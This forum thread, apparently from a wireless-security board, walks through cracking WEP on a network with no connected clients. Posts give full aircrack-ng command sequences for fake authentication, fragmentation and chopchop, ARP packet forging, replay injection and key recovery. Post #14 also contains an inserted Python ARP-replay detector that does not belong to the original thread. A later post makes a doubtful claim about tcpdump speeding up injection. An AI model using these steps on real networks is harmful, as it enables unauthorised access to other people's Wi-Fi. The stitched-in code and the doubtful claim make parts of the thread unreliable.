Thread: Only Beacons no IV's

  1. #11
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    4


    I start off with

    airodump-ng -c 6 -w name --bssid bssid wlan0

    Then for the injection I start off with the -1 0 command. (Don't know what it does though..)

    aireplay-ng -1 0 -a bssid -h mymac wlan0

    This only works sometimes though, and since I don't know what it does, I don't know why = / (If it doesn't work it just says "Sending Authentication Request (Open System)" over and over again.)

    aireplay-ng -3 -b bssid -h mymac wlan0

    That last command doesn't make the beacons nor the IVs go any faster..
    Will try the -4 -5 command later on.
    Thanks for any info about this.

    hugs

  2. #12
    Member
    Join Date
    Mar 2007
    Posts
    204


    Ok, I made some red comments

    Quote Originally Posted by Sinom View Post
    I start off with

    airodump-ng -c 6 -w name --bssid bssid wlan0

    Then for the injection I start off with the -1 0 command. (Don't know what it does though..) fake authentication

    aireplay-ng -1 0 -a bssid -h mymac wlan0

    This only works sometimes though, and since I don't know what it does, I don't know why = / (If it doesn't work it just says "Sending Authentication Request (Open System)" over and over again.)

    aireplay-ng -3 -b bssid -h mymac wlan0 you're trying to replay an ARP from a non-associated MAC. Definitely replace this with either -4 or -5

    That last command doesn't make the beacons nor the IVs go any faster..
    Will try the -4 -5 command later on.
    Thanks for any info about this.

    hugs

  3. #13
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    8


    If there are no clients on the network, my choice of attack would be either the --chopchop or the --fragment to get the data necessary for packetforge to build a custom ARP packet.

    You could then spam this to the AP using aireplay-ng while sniffing with airodump (filtered by BSSID, of course).

  4. #14
    hhmatt, Very good friend of the forum
    Join Date
    Jan 2010
    Posts
    660


    I'll show you how I run a clientless attack, but be aware this takes more time.

    First I'll authenticate to make sure I can. Use your wireless interface as appropriate; mine is ath0, yours could be different.

    Code:
    aireplay-ng -1 0 -e ESSID -a APMAC -h MYMAC ath0
    Once I authenticate I run it again, but this time I make it send the keep-alive packet every 30 seconds (because getting the right packet can take time I want to ensure I stay authenticated; this may not be necessary).

    Code:
    aireplay-ng -1 0 -q 30 -e ESSID -a APMAC -h MYMAC ath0
    Next, I start looking for that ARP packet using a fragmentation technique.

    Code:
    aireplay-ng -5 -b APMAC -h MYMAC ath0
    Hit Y when the screen prompts.

    If that fails for too long you can try the chopchop technique: it's -4 instead of -5 and you switch the -b and -h around.

    Once I get the right packet I use packetforge. Note the *.xor fragment file.

    Code:
    packetforge-ng -0 -a APMAC -h MYMAC -k 255.255.255.255 -l 255.255.255.255 -y fragmentfile.xor -w arp_request
    Then you want to use tcpdump (I forget exactly what this does; it has something to do with your forged packet used in the previous code.)

    Code:
    tcpdump -n -vvv -e -s0 -r arp_request
    Now is when you want to start sniffing for those IVs so when we start the next part it's already set up for us.

    Code:
    airodump-ng -c CHANNEL --bssid APMAC --ivs -w capture ath0
    Now we start forcing that AP to kick some serious packets out so we can catch all the IVs.

    Code:
    aireplay-ng -2 -r arp_request ath0
    Get a whole bunch; I just let it run for a while. There's a specific # you want to look for comparatively to the -bit encryption the AP is using, but the more the better anyways.

    Now we try to crack it!

    Code:
    aircrack-ng *.ivs -b APMAC
    If you didn't get enough IVs you can always read some more with the packets you made earlier!

    I'm always looking for suggestions myself; although I haven't even bothered with this wifi stuff for a while, I am still open for suggestions and comments.
    Now that I typed all that out I hope it all still applies; this is actually more for BT2 and I run off the CD, not a HD.
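A defender's view of the ARP replay described in the post above, as an added example (not from this thread or from the aircrack-ng project): the re-sent frame is byte-for-byte identical each time, so one station MAC emitting the same 24-bit WEP IV many times a second is a straightforward replay-injection signature, while the per-BSSID unique-IV count is the "IVs" figure the thread talks about. The MAC addresses and frame records are constructed for illustration.

```python
"""Spot WEP ARP-replay injection in captured 802.11 data frames.

Added example, not part of this thread or of the aircrack-ng suite: an ARP
replay re-sends one captured encrypted frame unchanged, so one station MAC
emits the same 24-bit WEP IV hundreds of times a second, whereas a real
client picks a fresh IV for nearly every frame. The frame records below are
constructed for illustration, not captured traffic.
"""
from collections import Counter, defaultdict

AP = "00:de:ad:be:ef:00"          # constructed BSSID
CLIENT = "00:11:22:33:44:55"      # constructed legitimate station
INJECTOR = "aa:bb:cc:dd:ee:ff"    # constructed replaying station


def build_sample():
    """Frames as (timestamp_ms, src MAC, BSSID, 3-byte IV, frame length)."""
    frames = []
    # Legitimate client: one frame every 500 ms, each with a distinct IV.
    for i in range(20):
        frames.append((i * 500, CLIENT, AP, bytes([0x10, 0x00, i]), 98))
    # Replay injector: the same ARP frame re-sent 100 times a second for 2 s.
    for i in range(200):
        frames.append((i * 10, INJECTOR, AP, bytes([0x2a, 0x7f, 0x03]), 68))
    return frames


def analyse(frames, window_ms=1000, replay_threshold=50):
    """Return ({bssid: unique IV count}, [(src, iv_hex, peak_per_window)]).

    A (src, IV) pair seen replay_threshold times inside one window is the
    signature of a verbatim replay rather than normal traffic.
    """
    ivs_per_bssid = defaultdict(set)
    hits = defaultdict(Counter)           # (src, iv) -> {window index: count}
    for ts_ms, src, bssid, iv, _length in frames:
        ivs_per_bssid[bssid].add(iv)
        hits[(src, iv)][ts_ms // window_ms] += 1
    alerts = [(src, iv.hex(), max(w.values()))
              for (src, iv), w in hits.items()
              if max(w.values()) >= replay_threshold]
    return {b: len(s) for b, s in ivs_per_bssid.items()}, alerts


if __name__ == "__main__":
    iv_counts, alerts = analyse(build_sample())
    print("unique IVs per BSSID:", iv_counts)
    for src, iv_hex, peak in alerts:
        print(f"replay suspected: {src} re-sent IV {iv_hex} {peak}x in one second")
```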

  5. #15
    Member
    Join Date
    Mar 2007
    Posts
    204


    The tcpdump command is not needed for this attack to work.

  6. #16
    hhmatt, Very good friend of the forum
    Join Date
    Jan 2010
    Posts
    660


    Quote Originally Posted by merlin051 View Post
    The tcpdump command is not needed for this attack to work.
    I've been testing this and have found that without the tcpdump command the data packets are very very slow. But once I use tcpdump the data packets increment at an incredible rate. I've tried this with a 2wire and a linksys wireless router.

    I'm wondering if there was something else you've done that didn't require the tcpdump command?
